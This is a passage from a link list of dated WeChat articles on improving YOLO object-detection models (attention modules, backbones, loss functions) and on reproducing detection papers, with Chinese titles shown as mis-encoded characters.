[2022-10-08๏ผŒYOLOv5ใ€YOLOv7ๆ”น่ฟ›ไน‹ไบŒๅไน๏ผšv2.0็‰ˆๆœฌ็š„Swin Transformer ่žๅ…ฅ](https://mp.weixin.qq.com/s/9g-JMK44YQDd3feTBwCYjA) - [2022-10-13๏ผŒYOLOv5ใ€YOLOv7ๆ”น่ฟ›ไน‹ไธ‰ๅ๏ผšๅผ•ๅ…ฅ10ๆœˆ4ๅทๅ‘่กจๆœ€ๆ–ฐ็š„Transformer่ง†่ง‰ๆจกๅž‹MOAT็ป“ๆž„](https://mp.weixin.qq.com/s/Y2kOLVbU5ZnNzPIoiv4voA) - [2022-10-14๏ผŒYOLOv5ใ€v7ๆ”น่ฟ›ไน‹ไธ‰ๅไธ€๏ผšCrissCrossAttentionๆณจๆ„ๅŠ›ๆœบๅˆถ](https://mp.weixin.qq.com/s/sSZfmjJHS3USGkqFd5N-Nw) - [2022-10-16๏ผŒYOLOv5ใ€v7ๆ”น่ฟ›ไน‹ไธ‰ๅไบŒ๏ผšSKAttentionๆณจๆ„ๅŠ›ๆœบๅˆถ](https://mp.weixin.qq.com/s/fgTTylKkDe36Z45MxMV_ig) - [2022-10-17๏ผŒYOLOv5ใ€v7ๆ”น่ฟ›ไน‹ไธ‰ๅไธ‰๏ผšๅผ•ๅ…ฅGAMAttentionๆณจๆ„ๅŠ›ๆœบๅˆถ](https://mp.weixin.qq.com/s/Tl5q7TEEPphXvzWQM_f61Q) - [2022-10-18๏ผŒYOLOv5ใ€v7ๆ”น่ฟ›ไน‹ไธ‰ๅๅ››๏ผšๆ›ดๆขๆฟ€ๆดปๅ‡ฝๆ•ฐไธบFReLU](https://mp.weixin.qq.com/s/k1FIIcaEZxSjuR6aRzotHg) - [2022-10-19๏ผŒYOLOv5ใ€v7ๆ”น่ฟ›ไน‹ไธ‰ๅไบ”๏ผšๅผ•ๅ…ฅNAMAttentionๆณจๆ„ๅŠ›ๆœบๅˆถ](https://mp.weixin.qq.com/s/rFe2pex6-YsUpRj8K-pw3g) - [2022-10-20๏ผŒYOLOv5ใ€v7ๆ”น่ฟ›ไน‹ไธ‰ๅๅ…ญ๏ผšๅผ•ๅ…ฅS2-MLPv2ๆณจๆ„ๅŠ›ๆœบๅˆถ](https://mp.weixin.qq.com/s/5MuJiodqJ4ixOSdogr5ebw) - [2022-10-21๏ผŒYOLOv5ใ€v7ๆ”น่ฟ›ไน‹ไธ‰ๅไธƒ๏ผš็ป“ๅˆCVPR2022ๆ–ฐไฝœConvNeXt็ฝ‘็ปœ](https://mp.weixin.qq.com/s/f9rjpRkeqBCWeTFkadLZpQ) - [2022-10-22๏ผŒYOLOv5ใ€v7ๆ”น่ฟ›ไน‹ไธ‰ๅๅ…ซ๏ผšๅผ•ๅ…ฅๆœ€ๆ–ฐRepVGG](https://mp.weixin.qq.com/s/7UhjzSwjR2U2h-FC7ZFbCw) - [2022-10-23๏ผŒYOLOv5ใ€v7ๆ”น่ฟ›ไน‹ไธ‰ๅไน๏ผšๅผ•ๅ…ฅๆ”น่ฟ›้ฎๆŒกๆฃ€ๆต‹็š„Tri-Layerๆ’ไปถ | BMVC 2022](https://mp.weixin.qq.com/s/X0f0MLhDYMrMZzx72vyGPg) - [2022-10-27๏ผŒYOLOv5ใ€v7ๆ”น่ฟ›ไน‹ๅ››ๅ๏ผš่ฝป้‡ๅŒ–mobileoneไธปๅนฒ็ฝ‘็ปœๅผ•ๅ…ฅ](https://mp.weixin.qq.com/s/rHTYQW5aRucVe8MoWUlA4Q) - [2022-11-01๏ผŒYOLOv5ใ€v7ๆ”น่ฟ›ไน‹ๅ››ๅไธ€๏ผšๅผ•ๅ…ฅSPD-Convๅค„็†ไฝŽๅˆ†่พจ็Ž‡ๅ›พๅƒๅ’Œๅฐๅฏน่ฑก้—ฎ้ข˜](https://mp.weixin.qq.com/s/TrB7-B-ppU2JkuQ5G46a8Q) - [2022-11-02๏ผŒYOLOv5ๆ”น่ฟ›ไน‹ๅ››ๅไบŒ๏ผšๅผ•ๅ…ฅV7ไธญ็š„ELAN็ฝ‘็ปœ๏ผŒ้™ไฝŽ็ฝ‘็ปœๅ‚ๆ•ฐ](https://mp.weixin.qq.com/s/cg4KinN-vEhcnoiQlN_tfw) - [2022-11-03๏ผŒYOLOv7ใ€v5ๆ”น่ฟ›ไน‹ๅ››ๅไธ‰๏ผš็ป“ๅˆๆœ€ๆ–ฐNon-local Networks and Attention็ป“ๆž„](https://mp.weixin.qq.com/s/P9TCtm6d_x6sRXtENTwY_A) - [2022-11-19๏ผŒYOLO็ณปๅˆ—ๆ”น่ฟ›ไน‹ๅ››ๅๅ››โ€”โ€”่žๅ…ฅ้€‚้…GPU็š„่ฝป้‡็บง G-GhostNet](https://mp.weixin.qq.com/s/vS7Lm73tgVbQZ6WdKT9J4Q) - [2022-11-10๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ไธ€๏ผšๅŸบไบŽๆ”น่ฟ›YOLOv5็š„ๆ•ด่ฝฆๅŽŸๆœจๆ•ฐ้‡ๆฃ€ๆต‹ๆ–นๆณ•โ€”โ€”TWD-YOLOv5](https://mp.weixin.qq.com/s/akrldqppGT6oyf89BnJe2Q) - [2022-11-12๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ไบŒ๏ผšๅŸบไบŽๆ”น่ฟ›YOLOv5็š„่ฝป้‡ๅŒ–่ˆช็ฉบ็›ฎๆ ‡ๆฃ€ๆต‹ๆ–นๆณ•](https://mp.weixin.qq.com/s/fOAzM-1_b29B79E8gxTP1Q) - [2022-11-14๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ไธ‰๏ผšๅŸบไบŽๆ”น่ฟ›YOLOv7็š„Xๅ…‰ๅ›พๅƒๆ—‹่ฝฌ็›ฎๆ ‡ๆฃ€ๆต‹](https://mp.weixin.qq.com/s/6R9g3D2Xd-TZJ_DAiRcBzQ) - [2022-11-15๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ๅ››๏ผšๆ”น่ฟ›YOLOv5็ฎ—ๆณ•ๅœจๅœ่ฝฆๅœบ็ซ็พๆฃ€ๆต‹ไธญ็š„ๅบ”็”จ](https://mp.weixin.qq.com/s/LcImelrj1hbRHlP_QvLd6g) - [2022-11-16๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ไบ”๏ผšๆ”น่ฟ›YOLOv5็š„SARๅ›พๅƒ่ˆฐ่ˆน็›ฎๆ ‡ๆฃ€ๆต‹](https://mp.weixin.qq.com/s/UwmamMFM0jnzt1sG-CX6iQ) - [2022-11-17๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ๅ…ญ๏ผšๅŸบไบŽYOLOv5็š„้ฅๆ„Ÿๅ›พๅƒ่ˆฐ่ˆน็š„ๆฃ€ๆต‹ๆ–นๆณ•](https://mp.weixin.qq.com/s/Qnw_krVnZGxlWUgG8z6q_g) - [2022-11-20๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ไธƒ๏ผšๅŸบไบŽSE-YOLOv5s็š„็ป็ผ˜ๅญๆฃ€ๆต‹](https://mp.weixin.qq.com/s/jZI93jPaLtsCFK-kljjppw) - [2022-11-21๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ๅ…ซ๏ผšๅŸบไบŽYOLOv5s็š„ๆป‘้›ชไบบๅ‘˜ๆฃ€ๆต‹็ ”็ฉถ](https://mp.weixin.qq.com/s/47YVYj4svWnkbPrvrfOqmw) - [2022-11-22๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ไน๏ผšๅŸบไบŽๆ”น่ฟ›YOLOv5็š„ๅคๆ‚ๅœบๆ™ฏไธ‹SARๅ›พๅƒ่ˆน่ˆถๆฃ€ๆต‹ๆ–นๆณ•](https://mp.weixin.qq.com/s/8VUZ5RX84krFgBdCO7qMhQ) - [2022-11-23๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ๅ๏ผšๅŸบไบŽYOLOv5็š„้ฅๆ„Ÿๅ›พๅƒ็›ฎๆ ‡ๆฃ€ๆต‹](https://mp.weixin.qq.com/s/xEzrjEe8CGfgdttJevFbFw) - [2022-11-25๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ๅไธ€๏ผšๅŸบไบŽ็‰นๅพ่žๅˆไธŽๆณจๆ„ๅŠ›็š„้ฅๆ„Ÿๅ›พๅƒๅฐ็›ฎๆ ‡ๆฃ€ๆต‹](https://mp.weixin.qq.com/s/uPwcji5mGSstxI9gWnAXCQ) - [2022-11-26๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ๅไบŒ๏ผšๅŸบไบŽๆณจๆ„ๅŠ›ๆœบๅˆถๅ’ŒไธŠไธ‹ๆ–‡ไฟกๆฏ็š„็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•](https://mp.weixin.qq.com/s/Ii98povs_xjfUdSxe2WYsQ) - [2022-11-27๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ๅไธ‰๏ผšๆ”น่ฟ›YOLOv5s็š„้ฅๆ„Ÿๅ›พๅƒ็›ฎๆ ‡ๆฃ€ๆต‹](https://mp.weixin.qq.com/s/MByqnwl2YiujOCyWrgMMKg) - [2022-12-12๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ๅๅ››๏ผšไธ€็งๅŸบไบŽๆฎ‹ๅทฎ็ฝ‘็ปœไผ˜ๅŒ–็š„่ˆชๆ‹ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•](https://mp.weixin.qq.com/s/M2ilkFpP5VwBHa2bY8BLyw) - [2022-12-13๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ๅไบ”๏ผšๅŸบไบŽYOLOv5็š„ๅ…‰ๅญฆ้ฅๆ„Ÿๅ›พๅƒ่ˆฐ่ˆน็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•](https://mp.weixin.qq.com/s/qy0hMDcPyKsl5p28E7q30w) - [2022-12-14๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ๅๅ…ญ๏ผšๅŸบไบŽๆ”น่ฟ›YOLOv5็š„ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•](https://mp.weixin.qq.com/s/Z-FIlLzVE9obCM-YdtGpxg) - [2022-12-15๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ๅไธƒ๏ผš่žๅˆๆณจๆ„ๅŠ›ๆœบๅˆถ็š„YOLOv5ๅฃ็ฝฉๆฃ€ๆต‹็ฎ—ๆณ•](https://mp.weixin.qq.com/s/cQHDZkvyw7bYMRCaXUcPKQ) - [2022-12-16๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ๅๅ…ซ๏ผšๅŸบไบŽๆณจๆ„ๅŠ›ๆœบๅˆถ็š„ๅ…‰็บฟๆ˜ๆš—ๆกไปถไธ‹ๅฃ็ฝฉไฝฉๆˆดๆฃ€ๆต‹](https://mp.weixin.qq.com/s/Kxe6CGs8hR6vrYgagMVdPQ) - [2022-12-17๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ๅไน๏ผšๅŸบไบŽYOLOv5็ฝ‘็ปœๆจกๅž‹็š„ไบบๅ‘˜ๅฃ็ฝฉไฝฉๆˆดๅฎžๆ—ถๆฃ€ๆต‹](https://mp.weixin.qq.com/s/67KIqrl1xSFzUmI6vjjAkw) - [2022-12-18๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ไบŒๅ๏ผšๅŸบไบŽๆ”น่ฟ›Yolov5็š„ๅœฐ้“้šง้“้™„ๅฑž่ฎพๆ–ฝไธŽ่กฌ็ Œ่กจ่ง‚็—…ๅฎณๆฃ€ๆต‹ๆ–นๆณ•](https://mp.weixin.qq.com/s/2TXXKXsWFDJG2t48rPWGqQ) - [2022-12-19๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ไบŒๅไธ€:ๅŸบไบŽๆ”น่ฟ›YOLOv7็š„ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹](https://mp.weixin.qq.com/s/qlVnBh2FFw5yBOvCsP2G-g) - [2022-12-20๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็Žฐไน‹ไบŒๅไบŒ๏ผšๅคšๅฐบๅบฆไธ‹้ฅๆ„Ÿๅฐ็›ฎๆ ‡ๅคšๅคดๆณจๆ„ๅŠ›ๆฃ€ๆต‹](https://mp.weixin.qq.com/s/LH7IqfyXLGbmRXCq_SxDJQ) - [2023-01-16๏ผŒYOLOv7/YOLOv5็ณปๅˆ—ๆ”น่ฟ›ไน‹ๅ››ๅๅ››๏ผš่žๅ…ฅYOLOv8ไธญ็š„C2fๆจกๅ—](https://mp.weixin.qq.com/s/qe_LV_8W4hzUxxgax2O4_g) - [2023-01-17๏ผŒYOLOv7/YOLOv5็ณปๅˆ—ๆ”น่ฟ›ไน‹ๅ››ๅไบ”๏ผš่žๅ…ฅCFPNet็ฝ‘็ปœไธญ็š„ECVBlockๆจกๅ—๏ผŒๆๅ‡ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹่ƒฝๅŠ›](https://mp.weixin.qq.com/s/HwPwI-nwl8elbiZfDsqHKg) - [2023-01-18๏ผŒๅญฆไน ็ป้ชŒๅˆ†ไบซไน‹ๅไธ‰๏ผš้ฆ–ๅ‘ๅ…จ็ฝ‘่ฎฒ่งฃYOLOv8](https://mp.weixin.qq.com/s/B0WVnNYrRDXcX0pw_2cLjg) - [2023-01-24๏ผŒใ€็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็ŽฐNO.25ใ€‘ๅŸบไบŽๆ”น่ฟ›Yolov5็š„ๅœฐ้“้šง้“้™„ๅฑž่ฎพๆ–ฝไธŽ่กฌ็ Œ่กจ่ง‚็—…ๅฎณๆฃ€ๆต‹ๆ–นๆณ•](https://mp.weixin.qq.com/s/Zrth5ANIYOrjVaU0p2eRZQ) - [2023-01-25๏ผŒใ€็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็ŽฐNO.26ใ€‘ๅŸบไบŽๆ”น่ฟ›YOLOv5s็ฝ‘็ปœ็š„ๅฎžๆ—ถ่พ“ๆถฒ็›‘ๆต‹](https://mp.weixin.qq.com/s/URWmI6OVVtDkvxSEfroVVg) - [2023-01-28๏ผŒๅŸบไบŽๆ”น่ฟ›YOLOv5็š„่žบ็บน้’ข่กจ้ข็ผบ้™ทๆฃ€ๆต‹](https://mp.weixin.qq.com/s/nToaAvSgSViP4pQrD_Gfgg) - [2023-01-30๏ผŒใ€็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็ŽฐNO.28ใ€‘ๅŸบไบŽๆ”น่ฟ›YOLO v5็š„็”ตๅŽ‚็ฎก้“ๆฒนๆถฒๆณ„ๆผๆฃ€ๆต‹](https://mp.weixin.qq.com/s/mtMA87mMQGLA2f4jXlXiUw) - [2023-01-31๏ผŒใ€็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็ŽฐNO.29ใ€‘ๅŸบไบŽYOLO-ST็š„ๅฎ‰ๅ…จๅธฝไฝฉๆˆด็ฒพ็กฎๆฃ€ๆต‹็ฎ—ๆณ•](https://mp.weixin.qq.com/s/_tDSg2J3JopTBjQtawnycg) - [2023-02-03๏ผŒใ€็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็ŽฐNO.30ใ€‘ๅŸบไบŽๆ”น่ฟ›YOLOv5็š„ๅฎๅค่‰ๅŽŸ่—่™ซ่ฏ†ๅˆซๆจกๅž‹็ ”็ฉถ](https://mp.weixin.qq.com/s/UYdTR8axfUSCFEOiTN5wMw) - [2023-02-05๏ผŒใ€็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็ŽฐNO.31ใ€‘ๅŸบไบŽๆ”น่ฟ›YOLO v5ๅคๆ‚ๅœบๆ™ฏไธ‹่‚‰้น…ๅงฟๆ€็š„ๆฃ€ๆต‹็ฎ—ๆณ•็ ”็ฉถ](https://mp.weixin.qq.com/s/fMfsXIJ6v2cC18eWjrIbKw) - [2023-02-04๏ผŒใ€็›ฎๆ ‡ๆฃ€ๆต‹่ฎบๆ–‡่งฃ่ฏปๅค็ŽฐNO.32ใ€‘ๅŸบไบŽๆ”น่ฟ›YOLO็š„้ฃžๆœบ่ตท้™้˜ถๆฎต่ทŸ่ธชๆ–นๆณ•](https://mp.weixin.qq.com/s/jycEm-pwYhMkihvfS66YIg) - [2023-03-04๏ผŒใ€YOLOv8/YOLOv7/YOLOv5็ณปๅˆ—็ฎ—ๆณ•ๆ”น่ฟ›NO.55ใ€‘่žๅ…ฅ็พŽๅ›ขๆœ€ๆ–ฐQARepVGG](https://mp.weixin.qq.com/s/WvHoB5zSPPH1SHRahMLL8g) - [2023-03-07๏ผŒใ€YOLOv8/YOLOv7/YOLOv5็ณปๅˆ—็ฎ—ๆณ•ๆ”น่ฟ›NO.56ใ€‘ๅผ•ๅ…ฅContextual Transformerๆจกๅ—](https://mp.weixin.qq.com/s/T_v7QM_9P20vT5mjFg07xw) - [2023-03-10๏ผŒใ€YOLOv8/YOLOv7/YOLOv5/YOLOv4/Faster-rcnn็ณปๅˆ—็ฎ—ๆณ•ๆ”น่ฟ›NO.57ใ€‘ๅผ•ๅ…ฅๅฏๅฝขๅ˜ๅท็งฏ](https://mp.weixin.qq.com/s/XVl6o2-xK8BfT4BWbmqxxA) - [2023-03-14๏ผŒใ€YOLOv8/YOLOv7/YOLOv5/YOLOv4/Faster-rcnn็ณปๅˆ—็ฎ—ๆณ•ๆ”น่ฟ›ใ€‘ๅผ•ๅ…ฅDRconvๅŠจๆ€ๅŒบๅŸŸๆ„Ÿ็Ÿฅๅท็งฏ](https://mp.weixin.qq.com/s/GgN_Y9Kxkz0YP7dxtoMUsA) - [2023-03-15๏ผŒใ€YOLOv8/YOLOv7/YOLOv5/YOLOv4/Faster-rcnn็ณปๅˆ—็ฎ—ๆณ•ๆ”น่ฟ›NO.59ใ€‘ๅผ•ๅ…ฅASPPๆจกๅ—](https://mp.weixin.qq.com/s/_YjOXjxggHGPLg9T5bE2YQ) - [2023-03-30๏ผŒใ€YOLOv8/YOLOv7/YOLOv5/YOLOv4็ณปๅˆ—็ฎ—ๆณ•ๆ”น่ฟ›ใ€‘็ป“ๅˆNeurIPS 2022ๅนดGhostnetV2็ฝ‘็ปœๆจกๅ—](https://mp.weixin.qq.com/s/YgR-hc1aimba3ij9tfaBAw) - [2023-04-08๏ผŒYOLOv8/YOLOv7/YOLOv5/YOLOv4็ฎ—ๆณ•-็ป“ๅˆCVPR 2023 ๅณๆ’ๅณ็”จๅŠจๆ€็จ€็–ๆณจๆ„ๅŠ›BiFormerๆจกๅ—](https://mp.weixin.qq.com/s/JqDIRqM5XAMzqz-Un2yw8Q) - [2023-05-05๏ผŒ่‹ฑๆ–‡่ฎบๆ–‡๏ผˆsci๏ผ‰่งฃ่ฏปๅค็Žฐ๏ผšๅŸบไบŽๆณจๆ„ๆœบๅˆถ็š„ๆ”น่ฟ›YOLOv5s็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•](https://mp.weixin.qq.com/s/4Xu9UIwcpgGvqOkXVDhoYA) - [2023-05-10๏ผŒ่‹ฑๆ–‡่ฎบๆ–‡๏ผˆsci๏ผ‰่งฃ่ฏปๅค็Žฐ๏ผšๅŸบไบŽๆณจๆ„ๆœบๅˆถๅ’Œๆ„Ÿๅ—้‡Ž็š„YOLOv5ๅœจๅ”ๅกๅ›พๅƒ็ผบ้™ท่ฏ†ๅˆซไธญ็š„ๅบ”็”จ](https://mp.weixin.qq.com/s/D2yC4Qiztg1FH64f89iJ_A) - [2023-06-10๏ผŒ็ฎ—ๆณ•ๆ”น่ฟ›๏ผš้’ˆๅฏน้ฅๆ„Ÿๅ›พๅƒ็›ฎๆ ‡ๆฃ€ๆต‹ไธญ็š„ๅฐ็›ฎๆ ‡่ฟ›่กŒๆ”น่ฟ›CATnet๏ผˆContextAggregationๆจกๅ—๏ผ‰](https://mp.weixin.qq.com/s/T6VWbQJOWoE3kVTQp0cf7w) - [2023-06-27๏ผŒYOLOv8/YOLOv7/YOLOv5/YOLO/Faster-rcnnv4็ณปๅˆ—็ฎ—ๆณ•ๆ”น่ฟ›๏ผšๆณจๆ„ๅŠ›ๆœบๅˆถ๏ผˆEMA๏ผ‰](https://mp.weixin.qq.com/s/itgOWmlFID6KwDfiOcQ9Ag) - [2023-07-18๏ผŒYOLOv8/YOLOv7/YOLOv5/YOLOv4/Faster-rcnn็ณปๅˆ—็ฎ—ๆณ•ๆ”น่ฟ›๏ผšๆทปๅŠ ๆธ่ฟ‘็‰นๅพ้‡‘ๅญ—ๅก”็ฝ‘็ปœ](https://mp.weixin.qq.com/s/sdZq3AGcqc4rVywqaEmlYw) - [2023-07-27๏ผŒไธญ็ง‘ๅคงๆๅ‡บPE-YOLO | ่ฎฉYOLOๅฎถๆ—็ฎ—ๆณ•็›ดๅ‡ป้ป‘ๅคœ็›ฎๆ ‡ๆฃ€ๆต‹](https://mp.weixin.qq.com/s/7_6wCWbjqLsv09pd_m2NIQ) - [2023-07-28๏ผŒYOLOv8/YOLOv7/YOLOv5/YOLOv4็ญ‰็ณปๅˆ—็ฎ—ๆณ•ๆ”น่ฟ›๏ผšๆ”น่ฟ›่พนๆก†ไฝ็ฝฎๅ›žๅฝ’ๆŸๅคฑๅ‡ฝๆ•ฐ๏ผˆMPDIoUๆŸๅคฑๅ‡ฝๆ•ฐ๏ผ‰](https://mp.weixin.qq.com/s/hKdFzeEvgOI-IkZebDxORQ) - [2023-07-31๏ผŒ่ฟœ่ถ…YOLOP | ่ถ…่ฝป่ถ…ๅฟซ็š„TwinLiteNetๅฎž็ŽฐๅคšไปปๅŠก่‡ชๅŠจ้ฉพ้ฉถๆ„Ÿ็Ÿฅ](https://mp.weixin.qq.com/s/qXFQeYOrdBNWEblVgodcfg) - [2024-05-22๏ผŒYOLOv8็ฎ—ๆณ•ๆ”น่ฟ›ใ€NO.132ใ€‘ๅˆฉ็”จHCANetไธญๅ…ทๆœ‰ๅ…จๅฑ€ๅ’Œๅฑ€้ƒจไฟกๆฏ็š„ๆณจๆ„ๅŠ›ๆœบๅˆถCAFM่ฟ›่กŒDEA-NetๅฝขๆˆไบŒๆฌกๅˆ›ๆ–ฐๆจกๅ—](https://mp.weixin.qq.com/s/0ZT4YxAInMAy_3dy5YJ5-A) - [2024-05-23๏ผŒYOLOv9/YOLOv8็ฎ—ๆณ•ๆ”น่ฟ›ใ€NO.133ใ€‘2024ๅนดๆœ€ๆ–ฐMobileNetV4่ฝป้‡็ฎ—ๆณ•ไฝœไธบYOLO็ฎ—ๆณ•็š„ไธปๅนฒ็‰นๅพๆๅ–็ฝ‘็ปœ](https://mp.weixin.qq.com/s/ua3vW4MSdWk0Mc15q3bvJg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆ‰€ๅ‘ๆŠซ้ก็š„ๅผ ๅคงๅˆ€ใ€ - [2022-04-24๏ผŒใ€ๅฐ็™ฝๅ…ฅๅ‘็ฏ‡ใ€‘็›ฎๆ ‡ๆฃ€ๆต‹็š„่ฏ„ไปทๆŒ‡ๆ ‡map](https://mp.weixin.qq.com/s/q308cHT0XliCK3NtIRjyqA) - [2022-07-02๏ผŒใ€yolov6็ณปๅˆ—ใ€‘็ป†่Š‚ๆ‹†่งฃ็ฝ‘็ปœๆก†ๆžถ](https://mp.weixin.qq.com/s/DFSROue8InARk-96I_Kptg) - [2022-07-13๏ผŒใ€yolov7็ณปๅˆ—ใ€‘็ฝ‘็ปœๆก†ๆžถ็ป†่Š‚ๆ‹†่งฃ](https://mp.weixin.qq.com/s/VEcUIaDrhc1ETIPr39l4rg) - [2022-07-23๏ผŒใ€yolov7็ณปๅˆ—ไบŒใ€‘ๆญฃ่ดŸๆ ทๆœฌๅˆ†้…็ญ–็•ฅ](https://mp.weixin.qq.com/s/nhZ3Q1NHm3op8abdVIGmLA) - [2022-07-29๏ผŒใ€yolov7็ณปๅˆ—ไธ‰ใ€‘ๅฎžๆˆ˜ไปŽ0ๆž„ๅปบ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆ•ฐๆฎ้›†](https://mp.weixin.qq.com/s/S80mMimu4YpHwClHIH07eA) - [2022-10-23๏ผŒไธ‡ๅญ—้•ฟๆ–‡่งฃๆžcvไธญ็š„ๆณจๆ„ๅŠ›ๆœบๅˆถ](https://mp.weixin.qq.com/s/kt3iIuOD3lsZBTIbOSGN0g) - [2022-11-23๏ผŒyolov5็š„ๆŒ็ปญๅ‘ๅŠ›|ๅˆ†็ฑปไปปๅŠก](https://mp.weixin.qq.com/s/YiK5kT-Yd-9k_V_aiSVYqw) - [2023-07-12๏ผŒ็ฎ—ๆณ•้ƒจ็ฝฒๆœๅŠกๅฎžๆˆ˜--ไปฃ็ ็ฏ‡](https://mp.weixin.qq.com/s/JrkRpIgTDtq6WN-hM8NwSA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้›†ๆ™บไนฆ็ซฅใ€ - [2022-07-07๏ผŒYOLOv7ๅฎ˜ๆ–นๅผ€ๆบ | Alexey Bochkovskiy็ซ™ๅฐ๏ผŒ็ฒพๅบฆ้€Ÿๅบฆ่ถ…่ถŠๆ‰€ๆœ‰YOLO๏ผŒ่ฟ˜ๅพ—ๆ˜ฏAB](https://mp.weixin.qq.com/s/5SeD09vG6nv46-YuN_uU1w) - [2022-07-27๏ผŒYOLOUๅผ€ๆบ | ๆฑ‡้›†YOLO็ณปๅˆ—ๆ‰€ๆœ‰็ฎ—ๆณ•๏ผŒ้›†็ฎ—ๆณ•ๅญฆไน ใ€็ง‘็ ”ๆ”น่ฟ›ใ€่ฝๅœฐไบŽไธ€่บซ๏ผ](https://mp.weixin.qq.com/s/clupheQ8iHnhR4FJcTtB8A) - [2022-09-25๏ผŒ่ฟžๅคœๅทๅ‡บ | ่ถ…่ถŠๆ‰€ๆœ‰YOLOๆฃ€ๆต‹ๆจกๅž‹๏ผŒmmdetๅผ€ๆบๅฝ“ไปŠๆœ€ๅผบๆœ€ๅฟซ็›ฎๆ ‡ๆฃ€ๆต‹ๆจกๅž‹๏ผ](https://mp.weixin.qq.com/s/2XErHzw9hWrrBry9Ij2pjA) - [2023-01-09๏ผŒYOLOv8ๆฅๅ•ฆ | ่ฏฆ็ป†่งฃ่ฏปYOLOv8็š„ๆ”น่ฟ›ๆจกๅ—๏ผYOLOv5ๅฎ˜ๆ–นๅ‡บๅ“YOLOv8๏ผŒๅฟ…ๅท๏ผ](https://mp.weixin.qq.com/s/l3fzlPzMFIxXK18rhqX-kg) - [2023-01-10๏ผŒไปŽๆ ‡ๆณจๅˆฐ้ƒจ็ฝฒ๏ผŒMMYOLO ไฟๅง†็บงๆ•™็จ‹๏ผ](https://mp.weixin.qq.com/s/rIi1XBUh_SZuNqKz473tcQ) - [2023-01-13๏ผŒYOLOv8ๅฎž่ทต | ๆ‰‹ๆŠŠๆ‰‹ๆ•™ไฝ ็”จYOLOv8่ฎญ็ปƒ่‡ชๅทฑ็š„ๆ•ฐๆฎ้›†ไปฅๅŠYOLOv8็š„ๅคšไปปๅŠกไฝฟ็”จ](https://mp.weixin.qq.com/s/vUXOX71rcqb3IzDca0nKVQ) - [2023-01-16๏ผŒYOLOv8 + DeepSORT | YOLOไธŽDeepSORT่ทŸ่ธช็š„้šพๅˆ†้šพ่ˆ๏ผŒ็›ดๆŽฅ็”จๅง๏ผˆ้™„ๆบ็ ๏ผ‰](https://mp.weixin.qq.com/s/AClsBD7jJPDUjJ_svwRplQ) - [2023-02-01๏ผŒYOLOๆถจ็‚นTrick | ่ถ…่ถŠCIOU/SIOU๏ผŒWise-IOU่ฎฉYolov7ๅ†ๆถจ1.5ไธช็‚น๏ผ](https://mp.weixin.qq.com/s/8TS70TpbqgQ5GB37zVgERA) - [2023-02-17๏ผŒEdgeYOLOๆฅ่ขญ | 